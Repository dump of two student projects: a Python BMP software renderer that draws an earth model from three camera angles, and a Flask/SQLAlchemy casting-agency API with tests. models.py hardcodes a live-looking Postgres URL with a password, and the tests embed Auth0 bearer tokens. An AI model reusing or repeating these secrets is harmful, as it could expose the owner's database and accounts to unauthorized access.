Takes the image_data and makes a file out of it with\n\t# a specif name\n\t# returns: 0 on success\n\tdef writeImage(self, fileName):\n\n\t\t# Makes the image file\n\t\timg = open(fileName + \".bmp\", 'wb')\n\t\timg.write(self.image_data)\n\n\t\treturn 0\n\n\tdef get_bmp_processor_info(self):\n\t\treturn \"bmp_processor Version B\"\n\n\tdef get_header_info(self):\n\t\treturn [self.width, self.height,self.bits_per_pixel, self.row_bytes, self.row_padding]\n\n\tdef get_viewport_info(self):\n\t\treturn [slef.viewport_x, self.viewport_y, self.viewport_width, self.viewport_height]\n\n\tdef get_clearColors_info(self):\n\t\treturn [self.clearRgbRed, self.clearRgbGreen, self.clearRgbBlue]\n\n\tdef get_paintColors_info(self):\n\t\treturn [self.paintRgbRed, self.paintRgbGreen, self.paintRgbBlue]\n" }, { "alpha_fraction": 0.6190226078033447, "alphanum_fraction": 0.665790855884552, "avg_line_length": 21.654762268066406, "blob_id": "0ded473310a4cca61178cf7f2140dd91461417ee", "content_id": "7484c8608c9dfe2154511233d7bf973c9c3667af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1903, "license_type": "no_license", "max_line_length": 80, "num_lines": 84, "path": "/SR6.py", "repo_name": "LuisDiego19FV/Graficas-SR6", "src_encoding": "UTF-8", "text": "#SR5\n#Luis Diego Fernandez\n\nimport sys\nimport bmp_processor\nimport numpy as np\n\n# image\nimage = bmp_processor.bmpImage(600,600)\n\nprint(image.get_bmp_processor_info())\n\n#Decide color\nimage.glClearColor(0,0,0)\nimage.glColor(0,0,0)\nimage.glClear()\n\nimage_skeleton = image.glObjReader(\"obj/earth\")\nimage.glLoadTextureImage('obj/earth',2,1)\n\n#Load model\n# pipeline: readImage -> loadTextures -> writeObject\n\ndef lowangle():\n\n print(\"lowangle\")\n\n imageLow = bmp_processor.bmpImage(400,400)\n imageLow.glLoadTextureImage('obj/earth',2,1)\n\n imageLow.glClearColor(0,0,0)\n imageLow.glColor(0,0,0)\n imageLow.glClear()\n\n imageLow.glObjWriter(image_skeleton,700,0.5,0.65,0)\n imageLow.writeImage(\"earth-lowangle\")\n\n print(\"\\n\")\n\ndef mediumshot():\n print(\"mediumshot\")\n\n imageMid = bmp_processor.bmpImage(400,400)\n imageMid.glLoadTextureImage('obj/earth',2,1)\n\n imageMid.glClearColor(0,0,0)\n imageMid.glColor(0,0,0)\n imageMid.glClear()\n\n imageMid.glObjWriter(image_skeleton,600,0.5,0.5,0)\n imageMid.writeImage(\"earth-mediumshot\")\n\n print(\"\\n\")\n\ndef highangle():\n print(\"highangle\")\n\n imageHigh = bmp_processor.bmpImage(400,400)\n imageHigh.glLoadTextureImage('obj/earth',2,1)\n\n imageHigh.glClearColor(0,0,0)\n imageHigh.glColor(0,0,0)\n imageHigh.glClear()\n\n imageHigh.glObjWriter(image_skeleton,1200,0.5,0.25,0)\n imageHigh.writeImage(\"earth-highangle\")\n\n print(\"\\n\")\n\nif len(sys.argv) == 2:\n if str.lower(sys.argv[1]) == \"low\":\n lowangle()\n elif str.lower(sys.argv[1]) == \"mid\":\n mediumshot()\n elif str.lower(sys.argv[1]) == \"high\":\n highangle()\n elif str.lower(sys.argv[1]) == \"all\":\n lowangle()\n mediumshot()\n highangle()\n else:\n print(\"Es necesario un argumento valido, elija: low, mid, high o all\")\nelse:\n print(\"Es necesario uno de los siguientes argumentos: low, mid, high o all\")\n" }, { "alpha_fraction": 0.6137440800666809, "alphanum_fraction": 0.6232227683067322, "avg_line_length": 34.16666793823242, "blob_id": "a2b70bd2698c75cbba38fc8c5e97f3b527fb6c6b", "content_id": "bfda0b3c8b054686b6423825df332a3e3cb18211", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 422, 
"license_type": "no_license", "max_line_length": 64, "num_lines": 12, "path": "/README.md", "repo_name": "LuisDiego19FV/Graficas-SR6", "src_encoding": "UTF-8", "text": "# Graficas-SR6\nCorrer SR6.py\n\n python3 SR6.py [argumento]\n \n Los posibles argumentos son:\n - low: para crear una imagen con low angle shot\n - mid: para crear una imagen con un mediumshot\n - high: para crear una imagen con un high angle shot\n - all: para crear todas las imagenes anterriores\n \n * se recomienda utilizar all para salir del paso rapido\n" } ]
3
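glAbsoluteLine in bmp_processor.py rasterizes a segment by special-casing vertical lines, swapping endpoints, and rounding the minor coordinate from the slope while stepping along the dominant axis. The standalone sketch below expresses the same idea for any octant, including the dx == 0 case, without the endpoint-swapping branches; the function name is ours and it is not part of the original class.

def raster_line(x0, y0, x1, y1):
    # Step along the axis with the larger extent so every column (or row)
    # on that axis gets exactly one pixel; interpolate the other coordinate.
    dx, dy = x1 - x0, y1 - y0
    steps = max(abs(dx), abs(dy))
    if steps == 0:
        return [(x0, y0)]  # degenerate segment: a single pixel
    return [(round(x0 + dx * t / steps), round(y0 + dy * t / steps))
            for t in range(steps + 1)]

# raster_line(0, 0, 5, 2) -> [(0, 0), (1, 0), (2, 1), (3, 1), (4, 2), (5, 2)]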
vinnn/FSND_Capstone
https://github.com/vinnn/FSND_Capstone
3d1f1c1c7d2d745321028a74ee6c75a8ae66eb31
d9a5ff3c26ac5388c7a1278f9147e84d0eae9656
c77002608f9c52ef157f2f081964f931c9a236e4
refs/heads/main
2023-08-22T05:37:19.952854
2021-10-16T18:32:17
2021-10-16T18:32:17
409,889,687
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.4518776535987854, "alphanum_fraction": 0.46443670988082886, "avg_line_length": 28.671586990356445, "blob_id": "92f6d15a166cd840f2dcc7f166289fcdd676988f", "content_id": "7c6e9dc477e37ed1053aeacd2ca294f42dd9c027", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8042, "license_type": "no_license", "max_line_length": 138, "num_lines": 271, "path": "/src/api.py", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "#########################################################\n#I# IMPORTS\n#########################################################\n# print('__file__={0:<35} | __name__={1:<25} | __package__={2:<25}'.format(__file__,__name__,str(__package__)))\n\n\nimport os\nfrom flask import Flask, request, jsonify, abort\nfrom sqlalchemy import exc\nimport json\nfrom flask_cors import CORS\n\n#I### Imports from models and auth\n#I# Note: written previously as '.database.models' and '.auth.auth'\nfrom .database.models import db_drop_and_create_all, setup_db, Actor #, Movie\nfrom .auth.auth import AuthError, requires_auth\n\n\n\n#########################################################\n#I# INITIALISATION\n#########################################################\ndef create_app(test_config=None):\n\n\n #########################################################\n #I# INITIALISATION\n #########################################################\n app = Flask(__name__)\n\n\n setup_db(app)\n CORS(app)\n\n\n\n #########################################################\n ## CORS Headers [TO BE CHECKED]\n #########################################################\n # @app.after_request\n # def after_request(response):\n # response.headers.add(\n # 'Access-Control-Allow-Headers',\n # 'Content-Type,Authorization,true')\n # response.headers.add(\n # 'Access-Control-Allow-Methods',\n # 'GET,PUT,POST,DELETE,OPTIONS')\n # return response\n\n\n\n\n\n\n\n #########################################################\n ## DROP ALL RECORDS AND START YOUR DB FROM SCRATCH\n #########################################################\n #db_drop_and_create_all()\n\n #########################################################\n ## ROUTES\n #########################################################\n '''\n endpoint GET /actors\n required permissions: \n 'get: actors'\n returns \n status code 200 and json {\"success\": True, \"actors\": actors}\n or error status code with reason for failure\n '''\n @app.route('/actors', methods=['GET'])\n @requires_auth(permission='get:actors')\n #def get_actors():\n def get_actors(payload):\n try: \n actors = Actor.query.order_by(Actor.id).all()\n actors_array = [actor.todictionary() for actor in actors]\n print(actors_array)\n except:\n abort(422)\n\n return jsonify({\n 'success': True,\n 'actors': actors_array\n }, 200)\n\n\n\n '''\n endpoint POST /actor\n should create a new row in the Actors table\n required permissions: \n 'post: actor'\n returns \n status code 200 and json {\"success\": True, \"actor\": actor} where actor is an array containing only the newly created actor\n or error status code with reason for failure\n '''\n @app.route('/actors', methods=['POST'])\n @requires_auth(permission='post:actors')\n def post_actors(payload):\n #def post_actors():\n try:\n \n body = request.get_json()\n\n new_name = body.get(\"name\", None)\n new_age = body.get(\"age\", None)\n new_gender = body.get(\"gender\", None)\n\n new_actor = Actor(\n name = new_name,\n age = new_age,\n gender = new_gender\n )\n 
new_actor.insert()\n\n return jsonify({\n 'success': True,\n 'actor': new_actor.todictionary()\n }, 200)\n\n except:\n abort(422)\n\n\n\n '''\n endpoint PATCH /actors/id\n where <id> is the existing actor id\n it should respond with a 404 error if <id> is not found\n it should update the corresponding row for <id>\n required permissions: \n 'patch: actors'\n returns \n status code 200 and json {\"success\": True, \"actor\": actor} where actor an array containing only the updated actor\n or error status code with reason for failure\n '''\n @app.route('/actors/<int:id>', methods=['PATCH'])\n @requires_auth(permission='patch:actors')\n def patch_actors(payload, id):\n #def patch_actors(id):\n \n actor_to_patch = Actor.query.filter(Actor.id == id).one_or_none()\n if actor_to_patch is None:\n abort(404)\n\n try:\n body = request.get_json()\n\n new_name = body.get(\"name\", None)\n new_age = body.get(\"age\", None)\n new_gender = body.get(\"gender\", None)\n\n print(new_name)\n\n if new_name != \"null\":\n actor_to_patch.name = new_name \n if new_age != \"null\":\n actor_to_patch.age = new_age\n if new_gender != \"null\":\n actor_to_patch.gender = new_gender\n\n actor_to_patch.update()\n\n return jsonify({\n 'success': True,\n 'actor': actor_to_patch.todictionary()\n }, 200)\n\n except:\n abort(422, \"bad request etc error description\")\n\n\n\n '''\n endpoint DELETE /actors/id\n where <id> is the existing actor id\n it should respond with a 404 error if <id> is not found\n it should delete the corresponding row for <id>\n required permissions: \n 'delete: actors'\n returns \n status code 200 and json {\"success\": True, \"actor\": actor} where actor an array containing only the deleted actor\n or error status code with reason for failure\n '''\n @app.route('/actors/<int:id>', methods=['DELETE'])\n @requires_auth(permission='delete:actors')\n def delete_actors(payload, id):\n #def delete_actors(id):\n \n actor_to_delete = Actor.query.filter(Actor.id == id).one_or_none()\n if actor_to_delete is None:\n abort(404)\n\n try:\n actor_to_delete.delete()\n\n return jsonify({\n 'success': True,\n 'actor': actor_to_delete.todictionary()\n }, 200)\n\n except:\n abort(422, \"bad request etc error description\")\n\n\n\n #########################################################\n ## Error Handling\n #########################################################\n '''\n Example error handling for unprocessable entity\n '''\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False, \n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False, \n \"error\": 404,\n \"message\": \"resource not found\"\n }), 404\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n 'success': False,\n 'error': 400,\n 'message': 'bad request'\n }), 400\n\n @app.errorhandler(405)\n def method_not_allowed(error):\n return jsonify({\n 'success': False,\n 'error': 405,\n 'message': 'method not allowed'\n }), 405\n\n\n\n '''\n @TODO implement error handler for AuthError\n error handler should conform to general task above \n '''\n #@app.errorhandler(AuthError)\n def handle_auth_error(ex):\n '''\n Receive the raised authorization error and include it in the response.\n '''\n response = jsonify(ex.error)\n response.status_code = ex.status_code\n\n return response\n \n \n return app\n\n\napp = create_app()\n\nif __name__ == '__main__':\n #app.run(host='0.0.0.0', port=8080, debug=True)\n 
app.run()\n\n" }, { "alpha_fraction": 0.49954456090927124, "alphanum_fraction": 0.5103448033332825, "avg_line_length": 34.082191467285156, "blob_id": "fed1d6a31d82ae8ca715a8392430e318bec96143", "content_id": "17001f7b1558a843a1be37a0158ce9898a8506d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7685, "license_type": "no_license", "max_line_length": 111, "num_lines": 219, "path": "/src/test_api.py", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "# ----------------------------------------------------------------------------#\n# Imports.\n# ----------------------------------------------------------------------------#\n# print('__file__={0:<35} | __name__={1:<25} | __package__={2:<25}'.format(__file__,__name__,str(__package__)))\n\n\nimport os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\nfrom .api import create_app # import the app=Flask(__name__) from api.py\nfrom .database.models import setup_db, Actor # import funtions and models form models.py\n\n\n# ----------------------------------------------------------------------------#\n# Test Class.\n# ----------------------------------------------------------------------------#\nclass CastingTestCase(unittest.TestCase):\n \"\"\"This class represents the Casting test case\"\"\"\n\n # Setup.\n # ----------------------------------------#\n def setUp(self):\n \"\"\"Executed before each test. \n Define test variables and initialize app.\"\"\"\n\n\n # MODIFIED START\n# self.app = create_app()\n# self.client = self.app.test_client\n self.app = create_app()\n self.client = self.app.test_client\n\n# self.database_name = \"casting_test\"\n# self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name) \n self.database_filename = \"database11_test.db\"\n self.project_dir = os.path.dirname(os.path.abspath(__file__))\n self.database_path = \"sqlite:///{}\".format(os.path.join(self.project_dir, self.database_filename))\n# setup_db(self.app, self.database_path)\n setup_db(self.app) #, self.database_path)\n\n\n self.castassistant_jwt = 'eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkJUdEl4MFNJZVNLRlpXMkFpbFMxMiJ9.eyJpc3MiOiJodHRwczovL2ZzbmQtY2Fwc3RvbmUtdGVuYW50LmV1LmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw2MTVkYTAzZWFmMGM3NTAwNjkxNTZiOGIiLCJhdWQiOiJmc25kLWNhcHN0b25lLWFwaS1pZGVudGlmaWVyIiwiaWF0IjoxNjM0MjA0MDg4LCJleHAiOjE2MzQyOTA0ODgsImF6cCI6IjVEeFBsQ2tPYUdDSWJmUHg2bFlVMXpuaEZqaUVpRnNDIiwic2NvcGUiOiIiLCJwZXJtaXNzaW9ucyI6WyJnZXQ6YWN0b3JzIiwiZ2V0Om1vdmllcyJdfQ.ua1CjrluoPgZDlPKK2UJokTfSeCnGOv5L-4UjZ_fWIp1PclvBZrdTzQdpEIcIpVqOjFgg3AFdIkhUiFcJjoLxDNn77RZMqEOJ2xURG6c-KO-oiTzT_ZJkzUOgw4pB5Bxv_wc60GSEtDUdTXRQ_z4UdmzPdfO1Ire5zGBNM2esodq3lh8bdAsJgV7QGst9t0qyP1xyxJjn2RdYClGIGiIVc_GwMoHwmb0IaSHZWyXBpXYRJ6OuzfLVkQYGUZKE79NmXbq2BXN5MrkK_sNkr2zgrpmJQjKN-9EOPGBdtGVj72lk4tYfZRrWV_rP7_v2cvT4FN9aq9oVHW4BRurrGnk9w'\n\n self.prodexec_jwt = 
'eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkJUdEl4MFNJZVNLRlpXMkFpbFMxMiJ9.eyJpc3MiOiJodHRwczovL2ZzbmQtY2Fwc3RvbmUtdGVuYW50LmV1LmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw2MTYwMWEyZjVjZDk2YjAwNzAyZDA5NGUiLCJhdWQiOiJmc25kLWNhcHN0b25lLWFwaS1pZGVudGlmaWVyIiwiaWF0IjoxNjM0MjA0ODE0LCJleHAiOjE2MzQyOTEyMTQsImF6cCI6IjVEeFBsQ2tPYUdDSWJmUHg2bFlVMXpuaEZqaUVpRnNDIiwic2NvcGUiOiIiLCJwZXJtaXNzaW9ucyI6WyJkZWxldGU6YWN0b3JzIiwiZGVsZXRlOm1vdmllcyIsImdldDphY3RvcnMiLCJnZXQ6bW92aWVzIiwicGF0Y2g6YWN0b3JzIiwicGF0Y2g6bW92aWVzIiwicG9zdDphY3RvcnMiLCJwb3N0Om1vdmllcyJdfQ.5VDTMXjy7oc_EqXi5ImwygbCVfvb-iEF6fyWxJG2HBwfbjiOZZyRDU431wqsMvy8MElX1Yy79mm3LzRJPa2mA4Mluq3_aMdjwXT4Nz95KzIhlzgrkD32KYUK-NtlIOue-4AEczVQuZPXvFduEe3RvhzKwna4f9G7QMevV1phglE39IkZcNzcZ4cyNLmDYn3aSPIwfMN7r3Ij4_sslcJSM7gTsz_FUVZa9NSxxitc5i5CFimMItZaFUMrxXwP4Xc6V6-67jFj2hENXq_XUtdPKHs23GFeVnK9G-f7NFiFZdo3EiU4gsddQSU8B0HfzS8EmLYlWWCida0FBHxwacawWw'\n\n\n # MODIFIED END\n\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n # creates a new question object, to be used\n # in the POST question tests:\n self.new_actor = {\n 'name': 'Titi?',\n 'age': 40,\n 'gender': 'Male', \n }\n self.update_actor = {\n 'name': 'actor3newname',\n 'age': 100,\n 'gender': 'Male', \n }\n self.new_quiz = {\n 'quiz_category': {'type': 'Geography', 'id': '3'},\n 'previous_questions': []\n }\n\n # Teardown.\n # ----------------------------------------# \n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n # Test. [GET NON-EXISTENT URL => ERROR ]\n # ----------------------------------------# \n def test_404_nonexistent_url(self):\n # Get response by making client make the GET request: \n res = self.client().get('/actors2',\n headers={'Authorization':'Bearer'+ self.castassistant_jwt}\n )\n # Load the data using json.loads:\n data = json.loads(res.data)\n\n # check responses:\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'resource not found')\n\n # Test. [GET ACTORS => OK ]\n # ----------------------------------------# \n def test_200_get_categories(self):\n # Get response by making client make the GET request:\n res = self.client().get('/actors',\n headers={'Authorization':'Bearer '+ self.castassistant_jwt}\n )\n \n # Load the data using json.loads:\n data = json.loads(res.data)\n\n # check responses:\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data[0]['success'], True)\n self.assertTrue(data[0]['actors']) # check the result contains 'actors' dictionary\n\n # Test. [DELETE ACTOR id => OK ]\n # ----------------------------------------# \n # def test_200_delete_actor(self):\n # Get response by making client make the DELETE request:\n # res = self.client().delete('/actors/8',\n # headers={'Authorization':'Bearer '+ self.prodexec_jwt}\n # ) \n\n # # Load the data using json.loads:\n # data = json.loads(res.data)\n\n # # check responses:\n # self.assertEqual(res.status_code, 200)\n # self.assertEqual(data[0]['success'], True)\n\n\n # Test. 
[DELETE NON-EXISTENT ACTOR => ERROR ]\n # ----------------------------------------# \n def test_404_delete_nonexistent_actor(self):\n # Get response by making client make the GET request:\n res = self.client().delete('/actors/2000',\n headers={'Authorization':'Bearer '+ self.prodexec_jwt}\n ) \n # Load the data using json.loads:\n data = json.loads(res.data)\n\n print(\"DATA : \")\n print(data)\n\n # check responses:\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'resource not found')\n\n # Test. [POST ACTOR id => OK ]\n # ----------------------------------------# \n # def test_200_post_actor(self):\n # # Get response by making client make the \n # # POST request (new_question is defined above):\n # res = self.client().post('/actors', \n # json=self.new_actor,\n # headers={'Authorization':'Bearer '+ self.prodexec_jwt} \n # )\n # # Load the data using json.loads:\n # data = json.loads(res.data)\n\n # # check responses:\n # self.assertEqual(res.status_code, 200)\n # self.assertEqual(data[0]['success'], True)\n\n\n # Test. [POST ACTOR WITH NO INFO => ERROR ]\n # ----------------------------------------# \n def test_422_post_wrong_actor_info(self):\n # Get response by making client make the \n # POST request, without json input info:\n res = self.client().post('/actors', \n json='wrongactor',\n headers={'Authorization':'Bearer '+ self.prodexec_jwt} \n )\n # Load the data using json.loads:\n data = json.loads(res.data)\n\n # check responses:\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'unprocessable')\n\n # Test. [PATCH ACTOR id => OK ]\n # ----------------------------------------# \n def test_200_patch_actor(self):\n # Get response by making client make the \n # PATCH request (update_actor is defined above):\n res = self.client().patch('/actors/3', \n json=self.update_actor,\n headers={'Authorization':'Bearer '+ self.prodexec_jwt} \n )\n\n # Load the data using json.loads:\n data = json.loads(res.data)\n\n # check responses:\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data[0]['success'], True)\n\n\n # Test. 
[PATCH ACTOR WITH NO INFO => ERROR ]\n # ----------------------------------------# \n def test_422_patch_no_patchdata(self):\n # Get response by making client make the \n # PATCH request, without json input info:\n res = self.client().patch('/actors/3', \n json='wrongpatch',\n headers={'Authorization':'Bearer '+ self.prodexec_jwt} \n )\n\n # Load the data using json.loads:\n data = json.loads(res.data)\n\n # check responses:\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'unprocessable')\n\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()\n\n\n" }, { "alpha_fraction": 0.5010941028594971, "alphanum_fraction": 0.6936542391777039, "avg_line_length": 16.576923370361328, "blob_id": "9bf5ca799e494501474cbe771c91d9a818169137", "content_id": "89d22efede65754b4a013455057e5183f676c2cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 457, "license_type": "no_license", "max_line_length": 29, "num_lines": 26, "path": "/requirements.txt", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "astroid==2.8.2\nclick==8.0.1\necdsa==0.17.0\nFlask==1.0.2\nFlask-Cors==3.0.8\nFlask-SQLAlchemy==2.4.0\nfuture==0.18.2\ngunicorn==20.1.0\nimportlib-metadata==4.8.1\nisort==4.3.21\nitsdangerous==2.0.1\nJinja2==3.0.1\nlazy-object-proxy==1.6.0\nMarkupSafe==2.0.1\nmccabe==0.6.1\npsycopg2==2.9.1\npycryptodome==3.3.1\npylint==2.3.1\npython-jose-cryptodome==1.3.2\nsix==1.16.0\nSQLAlchemy==1.3.3\ntyped-ast==1.4.3\ntyping-extensions==3.10.0.2\nWerkzeug==2.0.2\nwrapt==1.12.1\nzipp==3.5.0\n" }, { "alpha_fraction": 0.48751312494277954, "alphanum_fraction": 0.5043022036552429, "avg_line_length": 29.729032516479492, "blob_id": "dd7e3012fb6e836f399c0fd70aed1119f739864e", "content_id": "650e1359e6b0f9c9131cdec8e2dd4657e535150d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4765, "license_type": "no_license", "max_line_length": 175, "num_lines": 155, "path": "/src/database/models.py", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "#########################################################\n#I# IMPORTS \n#########################################################\nimport os\nfrom sqlalchemy import Column, String, Integer\nfrom flask_sqlalchemy import SQLAlchemy\nimport json\n\n\n#########################################################\n#I# DATABASE CONFIGURATION\n#########################################################\n\n# SQLITE SETUP ###################################\n# database_filename = \"database11.db\"\n# project_dir = os.path.dirname(os.path.abspath(__file__))\n# database_path = \"sqlite:///{}\".format(os.path.join(project_dir, database_filename))\n# '''\n# use db = SQLAlchemy() + db.init_app(app), instead of db = SQLAlchemy(app)\n# https://flask.palletsprojects.com/en/1.1.x/patterns/appfactories/factories-extensions\n# '''\n# db = SQLAlchemy() \n# '''\n# setup_db(app)\n# binds a flask application and a SQLAlchemy service\n# '''\n# def setup_db(app):\n# app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_path\n# app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n# db.app = app\n# db.init_app(app)\n\n\n# POSTGRES SETUP ###################################\ndatabase_name = \"db_capstone\"\ndatabase_path = \"postgresql://{}/{}\".format('localhost:5432', database_name)\n# postgresql://localhost:5432/db_capstone\n\ndatabase_path = 
\"postgres://nfkphcncctfhsr:28a0b6b1e059768d27a4f75e8034b9d8dfa36395ca7011c1614f28503974b6ac@ec2-54-195-246-55.eu-west-1.compute.amazonaws.com:5432/d69ah6men0oka\"\n\n\ndb = SQLAlchemy()\n\n\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(\"%%%%%%%%%%%%%%%%%%%%%% DATABASE_URL : %%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(database_path)\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n\n'''\nsetup_db(app)\n binds a flask application and a SQLAlchemy service\n'''\ndef setup_db(app, database_path=database_path):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_path\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n db.init_app(app)\n db.create_all()\n\n\n\n\n\n#########################################################\n\n#########################################################\n'''\ndb_drop_and_create_all()\n drops the database tables and starts fresh\n can be used to initialize a clean database\n !!NOTE you can change the database_filename variable to have multiple versions of a database\n'''\ndef db_drop_and_create_all():\n db.drop_all()\n db.create_all()\n\n\n#########################################################\n\n#########################################################\n'''\nActor\nan actor entity, extends the base SQLAlchemy Model\n'''\nclass Actor(db.Model):\n __tablename__ = 'actors' # table name to be plural, non-capitalized\n # Autoincrementing, unique primary key\n id = Column(Integer().with_variant(Integer, \"sqlite\"), primary_key=True)\n # String Name\n name = Column(String(80), unique=True, nullable=False)\n # String Age\n age = Column(Integer, unique=False, nullable=False)\n # String Gender\n gender = Column(String(80), unique=False, nullable=False)\n\n '''\n todictionary()\n dictionary representation of the model\n ''' \n def todictionary(self):\n return {\n 'name': self.name,\n 'age': self.age,\n 'gender': self.gender\n }\n\n '''\n insert()\n inserts a new model into a database\n the model must have a unique name\n the model must have a unique id or null id\n EXAMPLE\n actor = Actor(name=req_name, age=req_age, gender=req_gender)\n actor.insert()\n '''\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n '''\n delete()\n deletes a new model into a database\n the model must exist in the database\n EXAMPLE\n actor = Actor(name=req_name, age=req_age)\n actor.delete()\n '''\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n '''\n update()\n updates a new model into a database\n the model must exist in the database\n EXAMPLE\n actor = Actor.query.filter(Actor.id == id).one_or_none()\n actor.name = 'James'\n actor.update()\n '''\n def update(self):\n db.session.commit()\n\n\n\n#########################################################\n#I# method to give a readable string representation (for debugging and testing)\n#########################################################\n def __repr__(self):\n return '<name %r>' % self.name\n\n\n" }, { "alpha_fraction": 0.50352942943573, "alphanum_fraction": 0.6941176652908325, "avg_line_length": 16.70833396911621, "blob_id": "6840d18113a78b2aaa3545300ec0da63e6372eb7", "content_id": "9fa95d73b0678fc975f3c05cc6b2ea7eaa1744eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Text", "length_bytes": 425, "license_type": "no_license", "max_line_length": 29, "num_lines": 24, "path": "/src/requirements.txt", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "astroid==2.8.2\nclick==8.0.1\necdsa==0.17.0\nFlask==1.0.2\nFlask-Cors==3.0.8\nFlask-SQLAlchemy==2.4.0\nfuture==0.18.2\nimportlib-metadata==4.8.1\nisort==4.3.21\nitsdangerous==2.0.1\nJinja2==3.0.1\nlazy-object-proxy==1.6.0\nMarkupSafe==2.0.1\nmccabe==0.6.1\npycryptodome==3.3.1\npylint==2.3.1\npython-jose-cryptodome==1.3.2\nsix==1.16.0\nSQLAlchemy==1.3.3\ntyped-ast==1.4.3\ntyping-extensions==3.10.0.2\nWerkzeug==0.15.4\nwrapt==1.12.1\nzipp==3.5.0\n" }, { "alpha_fraction": 0.7386363744735718, "alphanum_fraction": 0.7418830990791321, "avg_line_length": 18.838708877563477, "blob_id": "f38e1bf2403a5f6118bbe2326be47b34e5030bbb", "content_id": "1fcef680d25f50a9f0f0ee69e34ec815229feffe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 616, "license_type": "no_license", "max_line_length": 101, "num_lines": 31, "path": "/src/README.md", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "README\n\n\n\n\nFor deployment on Heroku:\n\n# install gunicorn\n$ pip3 install gunicorn\n\n# create a requirements.txt\n$ pip3 freeze > requirements.txt\n\n# create file 'Procfile' with content:\nweb: gunicorn \"app:create_app()\"\n\n\n# HEROKU\n# create account\n# install the Heroku CLI\n$ brew tap heroku/brew & brew install heroku\n# login for CLI\n$ heroku login\n+ press any key, this will open the Heroku login page in the browser. Then login. Then CLI logged in.\n\n# create new app on Heroku webpage\ncreate new app/\n\n# Back on CLI:\n# connect your git repository to the heroku new app\n$ heroku git:remote -a fsnd-capstone-app-heroku\n\n" } ]
6
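api.py builds the Flask application inside create_app(), the application-factory pattern, which is what lets test_api.py construct an app bound to its own test database and create a test client in setUp. A minimal self-contained sketch of that shape follows; the /ping route is illustrative only and not part of this project's API.

from flask import Flask, jsonify

def create_app(test_config=None):
    # Build and configure the app inside a function so each caller
    # (production entry point, test suite) gets an isolated instance.
    app = Flask(__name__)

    @app.route('/ping')
    def ping():
        return jsonify({'success': True})

    return app

# Mirroring test_api.py's setUp:
# client = create_app().test_client()
# assert client.get('/ping').status_code == 200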
tanmayee30/XML_Prasing
https://github.com/tanmayee30/XML_Prasing
d542949cbc08b54c1963cbae9fd802e118799c45
4aecb33158871714a219cf088f3b75fa04199eac
96b02ece526257cf8f3126778c3cdc62d70314b7
refs/heads/master
2021-05-23T05:34:02.391320
2017-08-11T05:46:37
2017-08-11T05:46:37
95,078,062
0
0
null
null
null
null
null
